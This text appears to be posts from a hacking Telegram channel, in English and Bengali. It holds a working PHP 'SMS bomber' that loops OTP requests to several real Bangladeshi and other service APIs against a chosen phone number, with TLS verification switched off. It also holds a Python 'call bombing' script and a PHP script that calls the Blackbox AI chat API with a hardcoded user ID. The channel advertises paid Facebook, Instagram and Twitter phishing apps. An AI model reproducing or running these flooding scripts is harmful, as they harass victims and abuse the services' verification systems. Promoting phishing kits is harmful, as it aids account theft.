echo json_encode(array('status' => 'error', 'message' => 'Invalid input parameter'));
}
?>
sms bomber v2.<?php
function sendRequest($url, $data, $method = 'POST') {
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_URL, $url);
if ($method === 'POST') {
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, json_encode($data));
}
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$headers = array(
"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36",
"Content-Type: application/json",
);
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
$resp = curl_exec($curl);
if (curl_errno($curl)) {
echo 'Curl error: ' . curl_error($curl);
}
curl_close($curl);
return $resp;
}
$phn = $_REQUEST["phone"];
if (isset($phn) && !empty($phn)) {
$value = isset($_GET['value']) ? $_GET['value'] : 1; // Default value if 'value' parameter is not provided
for ($i = 1; $i <= $value; $i++) {
// API Calls
$data1 = array(
"phoneNumber" => $phn
);
$response1 = sendRequest("https://prod-api.viewlift.com/identity/otp/resend?site=hoichoitv", $data1);
$data2 = array(
"mobile" => "+88-".$phn,
"deviceToken" => "web",
"language" => "en",
"os" => "web"
);
$response2 = sendRequest("https://api.osudpotro.com/api/v1/users/send_otp", $data2);
$data3 = array(
"msisdn" => "88".$phn
);
$response3 = sendRequest("https://da-api.robi.com.bd/da-nll/otp/send", $data3);
// Get API Calls
$getApiResponse = sendRequest("https://bikroy.com/data/phone_number_login/verifications/phone_login?phone=" . $phn, null, 'GET');
$getApiResponse2 = sendRequest("https://bikroy.com/data/phone_number_login/verifications/phone_login?phone=" . $phn, null, 'GET');
// Output responses
echo "Response 1: $response1<br>";
echo "Response 2: $response2<br>";
echo "Response 3: $response3<br>";
echo "Get API Response 1: $getApiResponse<br>";
echo "Get API Response 2: $getApiResponse2<br>";
}
} else {
echo "Please provide a phone number in the URL.";
}
?>
Php sms bomber code. old project. you need to change somethings<?php
if (!isset($_GET['question'])) {
echo "No 'question' parameter provided.";
die();
}
$question = $_GET['question'];
$url = "https://www.blackbox.ai/api/chat";
$data = array(
"messages" => array(
array(
"id" => "QgsJtqQ",
"content" => $question,
"role" => "user"
)
),
"id" => "QgsJtqQ",
"userId" => "b330d735-78f6-417b-92fd-a7260c82e7d1",
"codeModelMode" => true,
"agentMode" => array(),
"trendingAgentMode" => array(),
"isMicMode" => false,
"userSystemPrompt" => null,
"maxTokens" => null,
"webSearchMode" => true,
"promptUrls" => null,
"isChromeExt" => false
);
$data_string = json_encode($data);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json',
'Content-Length: ' . strlen($data_string)
));
$result = curl_exec($ch);
$status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
//echo $result;
if ($status_code == 200) {
$output = [
"answer" => $result,
"dev" => "@Abdul_Kioum"
];
echo json_encode($output);
} else {
echo "Request failed with status code: $status_code";
}
?>
blackbox ai php code.
my old php code😂We will shut down Facebook phishing apps and Telegram bots starting tomorrow. only premium user can access telegram bot & app + Instagram + Twitter phishing app.
Contact us to get premium access
@DH_Admin_bot
আমরা আগামীকাল থেকে Facebook ফিশিং অ্যাপ এবং টেলিগ্রাম বট বন্ধ করে দেব। শুধুমাত্র প্রিমিয়াম ব্যবহারকারীই টেলিগ্রাম বট এবং অ্যাপ + ইনস্টাগ্রাম + টুইটার ফিশিং অ্যাপ অ্যাক্সেস করতে পারবে।
প্রিমিয়াম অ্যাক্সেস নিতে আমাদের সাথে যোগাযোগ করুন
@DH_Admin_bot
import requests
def send_message():
number = input("Enter phone number: ")
repeat = int(input("Enter repeat count: "))
api_url = f"https://our-api.000webhostapp.com/call.php?number={number}"
for i in range(repeat):
response = requests.get(api_url)
if response.ok:
print(f"Message sent to {number} ({i + 1}/{repeat})")
else:
print("Failed to send message")
# Example usage:
send_message()
Call Bombing Python Script.প্রিয় বন্ধগণ,
আপনারা যদি আপনাদের বানানো যেকোন প্রজেক্ট, এপ , স্ক্রিপ্ট, ফাইল শেয়ার করতে চান তাহলে আমাদের সাথে যোগাযোগ করুন এবং আপনাদের দক্ষতা সবাইকে দেখাতে পারবেন ।
Contact:- @DH_Admin_bot
En.
Dear friends, If you want to share any project, app, script, file you have made then contact us and you can show your skills to everyone.
Contact:- @DH_Admin_bot
